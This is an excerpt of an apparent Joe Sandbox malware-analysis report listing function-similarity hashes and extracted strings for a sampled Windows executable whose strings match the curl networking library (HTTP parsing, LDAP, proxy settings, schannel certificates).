                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ioctlsocket
                                            • String ID:
                                            • API String ID: 3577187118-0
                                            • Opcode ID: c94a7031483957ba514d176006d7fe961fd69d16ab90eb25bfe450ab854bbbb6
                                            • Instruction ID: 4f7dc29ce8e321f07a9a5245ec9587b1bad93b71fd6fe93e29d7e1ebe612de3c
                                            • Opcode Fuzzy Hash: c94a7031483957ba514d176006d7fe961fd69d16ab90eb25bfe450ab854bbbb6
                                            • Instruction Fuzzy Hash: 26C08066F14581C2D3446F715485187A7B1AFC4614FD55436D34782124DD3CC2E58B50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strchr$fwrite$_strdupmemchrstrncmp
                                            • String ID: $ $ HTTP %3d$ HTTP/%1[23] %d$ HTTP/%1d.%1d%c%3d$ RTSP/%1d.%1d%c%3d$Connection closure while negotiating auth (HTTP 1.0?)$Connection:$Content-Encoding:$Content-Length:$Content-Range:$Content-Type:$Got 417 while waiting for a 100$HTTP$HTTP 1.0, assume close after body$HTTP error before end of send, keep sending$HTTP error before end of send, stop sending$HTTP/$HTTP/1.0 connection set to keep alive!$HTTP/1.0 proxy connection set to keep alive!$HTTP/1.1 proxy connection set close!$Invalid Content-Length: value$Keep sending data to get tossed away!$Last-Modified:$Location:$Lying server, not serving HTTP/2$Mark bundle as not supporting multiuse$Maximum file size exceeded$Negotiate: noauthpersist -> %d, header part: %s$Overflow Content-Length: value!$Persistent-Auth$Proxy-Connection:$Proxy-authenticate:$RTSP/$Received 101$Received HTTP/0.9 when not allowed$Retry-After:$Set-Cookie:$The requested URL returned error: %d$The requested URL returned error: %s$Transfer-Encoding:$Unsupported HTTP version in response$WWW-Authenticate:$close$false$keep-alive$no chunk, no close, no size. Assume close to signal end
                                            • API String ID: 3939785054-690044944
                                            • Opcode ID: 29391b55335036efc77e5294a79f8f76e0da53b964b828aae9b04ff18febf4e3
                                            • Instruction ID: 5539570c3e22b4bf8c2eac9bcf24ec30bbab4bd36561c362942ebba05b8a19f6
                                            • Opcode Fuzzy Hash: 29391b55335036efc77e5294a79f8f76e0da53b964b828aae9b04ff18febf4e3
                                            • Instruction Fuzzy Hash: DCC286B1B0868A45EB54AF259564BF9BF91AF41F88F884137CA4D8B2C5DE3DE444C332
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$#211$fwrite$#217calloc
                                            • String ID: ;binary$DN: $LDAP local: %s$LDAP local: %s$LDAP local: Cannot connect to %s:%ld$LDAP local: LDAP Vendor = %s ; LDAP Version = %d$LDAP local: bind via ldap_win_bind %s$LDAP local: trying to establish %s connection$LDAP remote: %s$Microsoft Corporation.$There are more than %d entries$cleartext$encrypted
                                            • API String ID: 2742731861-78870445
                                            • Opcode ID: 831d87dee25c1670673b59d4b4179000b4e3fe808a50e4d779f915d0a570c901
                                            • Instruction ID: 6a1603e62b657cf4bca96165e1d403f3dcc488fcfa36b45bed0532a36c9f3ae8
                                            • Opcode Fuzzy Hash: 831d87dee25c1670673b59d4b4179000b4e3fe808a50e4d779f915d0a570c901
                                            • Instruction Fuzzy Hash: D642A365B08A4A86E710AB61D465BBDABE1FF44F88F804036CE0EA7755DE3CE446C351
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: Xbad_function_call@std@@__std_exception_destroy_invalid_parameter_noinfo_noreturn
                                            • String ID: array$number overflow parsing '$object$object key$object separator
                                            • API String ID: 1664669839-85532522
                                            • Opcode ID: 5dc6d2020e20b7b7b4f3fd0f005dc465797da0486d902d5c39db5575fa961406
                                            • Instruction ID: 0968a147f40c1101ad1a92cb7f65eb91c089526c89309175992e3e84a8812cdf
                                            • Opcode Fuzzy Hash: 5dc6d2020e20b7b7b4f3fd0f005dc465797da0486d902d5c39db5575fa961406
                                            • Instruction Fuzzy Hash: F4A2C762B1CB4985EB10EB64E4543EDA7A1FF41BA4F805232DA5D87AE9DF7CD081C311
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLast$File$FreeLibraryRead$HandleMultipleNamedObjectsPeekPipeStartupTypeWaitcallocsend
                                            • String ID: $FreeLibrary(wsock2) failed (%u)$Time-out$WS2_32.DLL$WSACloseEvent$WSACloseEvent failed (%d)$WSACreateEvent$WSACreateEvent failed (%d)$WSAEnumNetworkEvents$WSAEnumNetworkEvents failed (%d)$WSAEventSelect$WSAStartup failed (%d)$failed to find WSACloseEvent function (%u)$failed to find WSACreateEvent function (%u)$failed to find WSAEnumNetworkEvents function (%u)$failed to find WSAEventSelect function (%u)$failed to load WS2_32.DLL (%u)$insufficient winsock version to support telnet
                                            • API String ID: 1025660337-777782649
                                            • Opcode ID: 3a84ad12ddd9242ef5708b47fd60f2fc0ce5b5ff1c798c18c0fc51936d33e422
                                            • Instruction ID: 7767d66badbad4ef727194a42f115dbd0ea90cb4adc39c5cb6bcc852392c7323
                                            • Opcode Fuzzy Hash: 3a84ad12ddd9242ef5708b47fd60f2fc0ce5b5ff1c798c18c0fc51936d33e422
                                            • Instruction Fuzzy Hash: 7412C335B0868A89EB74AF159461BB9AB90FF44F94F844536CA4ED3794DF3CE480C722
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemallocstrncmp
                                            • String ID: public key hash: sha256//%s$-----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$;sha256//$sha256//
                                            • API String ID: 1436789207-471711153
                                            • Opcode ID: 87d8b74bfaf9f01fe411e33134954ef59d3277864874ae862f6e598a426349ef
                                            • Instruction ID: 3b797e5847844d3d3f39278cfa35d5a9bc7a23ae85a2107dadbf9f4e267a5c2e
                                            • Opcode Fuzzy Hash: 87d8b74bfaf9f01fe411e33134954ef59d3277864874ae862f6e598a426349ef
                                            • Instruction Fuzzy Hash: C8A18221B09A4A81FA10AB65A4647B9AA90EF45FD0FC85033DE0E87795EF3CE455C732
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CreateFile_errnofree
                                            • String ID: -----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$schannel: CA file '%s' is not correctly formatted$schannel: CA file exceeds max size of %u bytes$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to determine size of CA file '%s': %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s$schannel: unexpected content type '%d' when extracting certificate from CA file '%s'
                                            • API String ID: 1377488173-902404565
                                            • Opcode ID: 919779ac502394a4df49bfc1684378c912bd20c5370d5fdb507a62585e4b15d8
                                            • Instruction ID: 675d563742b5082333a5a416889507bdaa9f83c3b150c3e02f6b24468648bde6
                                            • Opcode Fuzzy Hash: 919779ac502394a4df49bfc1684378c912bd20c5370d5fdb507a62585e4b15d8
                                            • Instruction Fuzzy Hash: E1B1A361B1874982EA10AB65E464BADAAA1BF44FD8FC00137DE4D87794DF7CE504CB22
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$strchr$_strdupmemsetreallocstrncpy$EnvironmentVariabletolower
                                            • String ID: ALL_PROXY$NO_PROXY$Uses proxy env variable %s == '%s'$_proxy$all_proxy$http_proxy$memory shortage$no_proxy
                                            • API String ID: 1339443121-1021110354
                                            • Opcode ID: 85b546518fe974906508f346c34f15a72552962cb0c771cf6e189cb72353a543
                                            • Instruction ID: 9a956ce68610abd1b05ae7ee3ff23329a0569f78bbfd92b404442dc6795ede75
                                            • Opcode Fuzzy Hash: 85b546518fe974906508f346c34f15a72552962cb0c771cf6e189cb72353a543
                                            • Instruction Fuzzy Hash: 3A02C461B1D78A85EA51EB21A464BB9AF94EF45F88F880037DE4D87795DF3CE004C722
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$malloc
                                            • String ID: WDigest$digest_sspi: MakeSignature failed, error 0x%08lx$realm
                                            • API String ID: 2190258309-2223379150
                                            • Opcode ID: 7071650c09dff2dad16001d1756b7afe7cc268e2c7eedb60c4a3bb5df4c44f15
                                            • Instruction ID: 6857adf2621d61eb37990ffec309607a9dd96ea9d99d6e7f7a4f4def28131f1d
                                            • Opcode Fuzzy Hash: 7071650c09dff2dad16001d1756b7afe7cc268e2c7eedb60c4a3bb5df4c44f15
                                            • Instruction Fuzzy Hash: A1121B32B08B4AC6EB10AF61E464BADBBA4FF44B88F940136DA4E83B54DF38D545C751
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strncmp$memset
                                            • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s
                                            • API String ID: 3268688168-2769131373
                                            • Opcode ID: 3e5bc1e74b012f5f58e1374a4c72a9ebe9ef3efd138e2f1c7d373a212fd8c81f
                                            • Instruction ID: 9f3d4bb79400b4742dfacc23f9b6f2afe2089d1b34dd23d90993673020af81ca
                                            • Opcode Fuzzy Hash: 3e5bc1e74b012f5f58e1374a4c72a9ebe9ef3efd138e2f1c7d373a212fd8c81f
                                            • Instruction Fuzzy Hash: A0E1E522F2868685EB10EB65A460BB9AB60FF89F88F805137DE4E83755DF7CD444C711
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strchr$_strdupfopenfseekstrncmpstrtol
                                            • String ID: $CurrentUser$schannel: Failed to import cert file %s, password is bad
                                            • API String ID: 4221717217-4282655970
                                            • Opcode ID: 0f6e02ceec97318be6b8f6dc4e8b7d26f1a3ae136c02508b05c6ed373cd8a422
                                            • Instruction ID: 8b2dca459d4faa0d2b43c70c9b718c7fb01874172fd449e5c04547a43ea57b74
                                            • Opcode Fuzzy Hash: 0f6e02ceec97318be6b8f6dc4e8b7d26f1a3ae136c02508b05c6ed373cd8a422
                                            • Instruction Fuzzy Hash: 6781C261B0964B82FB55AF25A960B79AB90BF44F94FC44136CA1EC63D0EF3CE444C362
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy$Xbad_function_call@std@@
                                            • String ID: array$number overflow parsing '$object
                                            • API String ID: 958247072-579821726
                                            • Opcode ID: 24dbfc32c8dc895f344db0d517b328b1238d857ed911aa6ec1f707056b30ba47
                                            • Instruction ID: 2ee5db4742e5861d45a9ef1a8f62383ff19dd4a5feb7488063a6b4ca3bbf26de
                                            • Opcode Fuzzy Hash: 24dbfc32c8dc895f344db0d517b328b1238d857ed911aa6ec1f707056b30ba47
                                            • Instruction Fuzzy Hash: B032B762B18B8A85EB10EB68D4543EDA3A1FF45B94F805232DA5D87AE9DF7CD084C311
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strchr$_strdupfopenfseekstrncmpstrtol
                                            • String ID: CurrentUser$schannel: Failed to import cert file %s, password is bad
                                            • API String ID: 4221717217-1887299029
                                            • Opcode ID: 15180cf14c634b185d4ef2093e72c7660534080491c5eda22c727618502a933b
                                            • Instruction ID: fa8c136beda975ba977f5c070305e68c1cf592dcbb5ae2ec598c4f22959f4033
                                            • Opcode Fuzzy Hash: 15180cf14c634b185d4ef2093e72c7660534080491c5eda22c727618502a933b
                                            • Instruction Fuzzy Hash: F181C361B0964B82FB55AF25A960B79AB90BF44F94FC44136CA1EC63D0EF3CE444C362
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$_strdup$fclosefgetsfopen
                                            • String ID: $default$login$machine$password
                                            • API String ID: 431015889-155862542
                                            • Opcode ID: 95c53613c4b75bead37d9737eb2d18ca3386db0ad298d740e1b388510a37e02d
                                            • Instruction ID: e29a61bffde0eb21ee25c0312b6264ba24e3ab39c2f680897daa40c9b508ad25
                                            • Opcode Fuzzy Hash: 95c53613c4b75bead37d9737eb2d18ca3386db0ad298d740e1b388510a37e02d
                                            • Instruction Fuzzy Hash: 3FA18821B0D68A85FA61AF259574B7EFE90BF85F48F884033DE4D86694DF3CE4448722
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyReleasememset
                                            • String ID: @
                                            • API String ID: 2041421932-2766056989
                                            • Opcode ID: bb794aa40aa15490590f884502f6a567689bfb5528de3085bcc22d0726435027
                                            • Instruction ID: 03d32ba02c0217fd8448711bfd19325948014f2bb40e7b6e9ecc99033d17408c
                                            • Opcode Fuzzy Hash: bb794aa40aa15490590f884502f6a567689bfb5528de3085bcc22d0726435027
                                            • Instruction Fuzzy Hash: F1314B7270868586E760DF21A554A6ABB60FFC4FC0F444036DA8E97A58CF3CD405CB11
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLast_errno$FormatMessagestrchr
                                            • String ID: Unknown error %u (0x%08X)
                                            • API String ID: 1897771742-1058733786
                                            • Opcode ID: 2a26dff799f40e172bf9d9a434e10a599cd41592b269adf14bd1a7543fbd748f
                                            • Instruction ID: 33c95a668a5059a85766590794cc2af865a08054935d983b1af8374464df4ea0
                                            • Opcode Fuzzy Hash: 2a26dff799f40e172bf9d9a434e10a599cd41592b269adf14bd1a7543fbd748f
                                            • Instruction Fuzzy Hash: 68219522B0874A86EB116F61A82077AFAD0BF54FD0F884036DE5993754CF3CE4508732
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Can not multiplex, even if we wanted to!$Connection #%ld is still name resolving, can't reuse$Connection #%ld isn't open enough, can't reuse$Could multiplex, but not asked to!$Found bundle for host %s: %p [%s]$Found pending candidate for reuse and CURLOPT_PIPEWAIT is set$Multiplexed connection found!$Server doesn't support multiplex (yet)$Server doesn't support multiplex yet, wait$can multiplex$serially
                                            • API String ID: 0-2774518510
                                            • Opcode ID: 0379ac116aa3b89d2553a78560e2e6e0937a33831639c842719652bd6057e29d
                                            • Instruction ID: c15395c3a0ab1c878668cb42f6b92dad765a9eaa26fcb84250949443056a2cde
                                            • Opcode Fuzzy Hash: 0379ac116aa3b89d2553a78560e2e6e0937a33831639c842719652bd6057e29d
                                            • Instruction Fuzzy Hash: 9642B661B1D6CA45EBA5AA3581607B9BF92BF41F4CFD84037CA5D87285DF3CA450C322
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 313767242-0
                                            • Opcode ID: fc71f2e38170f003502fc35b1a2a6786915c9dce6f2c40117b586646fb8be62b
                                            • Instruction ID: 20d676a6334abba6bc8b5e0d83e3fcf055dede2f1b3dbbef110acce741cd6654
                                            • Opcode Fuzzy Hash: fc71f2e38170f003502fc35b1a2a6786915c9dce6f2c40117b586646fb8be62b
                                            • Instruction Fuzzy Hash: 08316172704B8586EB60AFA4E8507ED7760FB84B48F40403ADA4D87B94EF3CD548C721
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: Crypt$Context$Release$AcquireDestroyEncryptImport
                                            • String ID: @
                                            • API String ID: 3016261861-2766056989
                                            • Opcode ID: d1a0f4d578b41c1f0fd4322c77e50cfad5c7b58d9a61eee987650c72cdb935cc
                                            • Instruction ID: 291a6f4baf7628d1523983ded703b77f4f69307e9b85080b465746c1415b2471
                                            • Opcode Fuzzy Hash: d1a0f4d578b41c1f0fd4322c77e50cfad5c7b58d9a61eee987650c72cdb935cc
                                            • Instruction Fuzzy Hash: 18419B22B046A08EF7109BB5E4607EE7FB0EB4A788F444026DE8D57A5ACF3CC11AD750
                                            APIs
                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000021C,-00000008,00000000,?,?,00007FF7E5A1C5C8,?,?,?,?,?,?,00007FF7E5A3380E), ref: 00007FF7E5A1C646
